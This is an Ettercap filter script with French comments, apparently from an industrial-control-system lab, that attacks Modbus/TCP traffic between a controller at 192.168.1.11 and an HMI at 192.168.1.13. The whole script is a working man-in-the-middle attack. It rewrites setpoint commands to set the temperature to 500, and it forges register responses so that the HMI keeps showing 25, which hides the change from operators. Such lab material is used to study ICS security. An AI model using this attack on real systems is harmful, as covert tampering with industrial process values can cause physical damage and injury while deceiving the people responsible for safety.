#Set Asked Temperature to 500 when Asked_Temperature is change
if (ip.dst =='192.168.1.11' && ip.proto==TCP && tcp.dst==502) {
    if (search(DATA.data, "\x01\x06\x00\x00")) {
        msg("Requete evoyee*************************************************\n");
        DATA.data="\x00\x00\x00\x00\x00\x06\x01\x06\x00\x00\x01\xF4";
    }  
}

if (ip.proto == TCP && tcp.src == 502) {
    msg("Trame modbus trouve\n");
    # Condition pour 192.168.1.11 -> 192.168.1.13
    if (ip.dst == '192.168.1.13' ) {
        msg("de .11 a .13\n");
        #Set value of the Asked_temperature on the HMI to 25
        if (search(DATA.data, "\x01\x03\x10")) {
            msg("Trame contenant un envoi de holding register trouve\n");
            DATA.data + 9 = "\x00\x19";
            DATA.data + 11 = "\x09\xc7";
            msg("la valeur du holding 0 modifier a 25");
        }
        
        
        #Intercept the answer of the changing of the Asked_Temperature to 500
        if (search(DATA.data, "\x00\x00\x00\x00\x00\x06\x01\x06\x00\x00\x01\xF4")) {
            msg("Reponse intercepte\n");
        }
    }
   
}



